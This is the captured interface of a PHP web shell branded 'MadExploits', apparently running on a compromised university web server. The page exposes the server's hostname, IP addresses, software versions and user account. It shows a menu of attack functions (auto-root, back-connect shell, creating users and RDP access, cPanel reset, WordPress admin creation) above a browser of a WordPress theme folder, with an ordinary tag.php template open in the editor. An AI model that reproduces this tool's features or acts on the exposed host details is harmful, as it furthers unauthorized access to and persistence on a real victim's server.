Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.16.130.96
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
appadmin /
cesa2025 /
wp-content /
themes /
jannah /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
buddypress
[ DIR ]
drwxrwxr-x
demos
[ DIR ]
drwxrwxr-x
framework
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
404.php
1.41
KB
-rw-rw-r--
archive-web-story.php
1.11
KB
-rw-rw-r--
archive.php
1.38
KB
-rw-rw-r--
author.php
1.42
KB
-rw-rw-r--
buddypress.php
816
B
-rw-rw-r--
category.php
3.89
KB
-rw-rw-r--
comments.php
1.52
KB
-rw-rw-r--
footer.php
404
B
-rw-rw-r--
functions.php
4.5
KB
-rw-rw-r--
header.php
681
B
-rw-rw-r--
index.php
1.05
KB
-rw-rw-r--
page.php
590
B
-rw-rw-r--
rtl.css
39.93
KB
-rw-rw-r--
screenshot.jpg
60.18
KB
-rw-rw-r--
search.php
1.45
KB
-rw-rw-r--
sidebar-footer.php
2.85
KB
-rw-rw-r--
sidebar-shop.php
751
B
-rw-rw-r--
sidebar-slide.php
4.07
KB
-rw-rw-r--
sidebar.php
2.42
KB
-rw-rw-r--
single.php
359
B
-rw-rw-r--
style.css
704
B
-rw-rw-r--
tag.php
1.42
KB
-rw-rw-r--
template-authors.php
230
B
-rw-rw-r--
template-masonry.php
377
B
-rw-rw-r--
template-sitemap.php
227
B
-rw-rw-r--
wpml-config.xml
7.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag.php
<?php /** * The template for displaying tag pages * */ defined( 'ABSPATH' ) || exit; // Exit if accessed directly get_header(); ?> <div <?php tie_content_column_attr(); ?>> <?php if ( have_posts() ) : ?> <header id="tag-title-section" class="entry-header-outer container-wrapper archive-title-wrapper"> <?php do_action( 'TieLabs/before_archive_title' ); the_archive_title( '<h1 class="page-title">', '</h1>' ); if( tie_get_option( 'tag_desc' ) ) { the_archive_description( '<div class="taxonomy-description entry">', '</div>' ); } do_action( 'TieLabs/after_archive_title' ); ?> </header><!-- .entry-header-outer /--> <?php // Get the layout template part TIELABS_HELPER::get_template_part( 'templates/archives', '', array( 'layout' => tie_get_option( 'tag_layout', 'excerpt' ), 'excerpt' => tie_get_option( 'tag_excerpt' ), 'excerpt_length' => tie_get_option( 'tag_excerpt_length' ), 'read_more' => tie_get_option( 'tag_read_more' ), 'read_more_text' => tie_get_option( 'tag_read_more_text' ), )); // Page navigation TIELABS_PAGINATION::show( array( 'type' => tie_get_option( 'tag_pagination' ) ) ); // If no content, include the "No posts found" template else : TIELABS_HELPER::get_template_part( 'templates/not-found' ); endif; ?> </div><!-- .main-content /--> <?php get_sidebar(); ?> <?php get_footer();
Close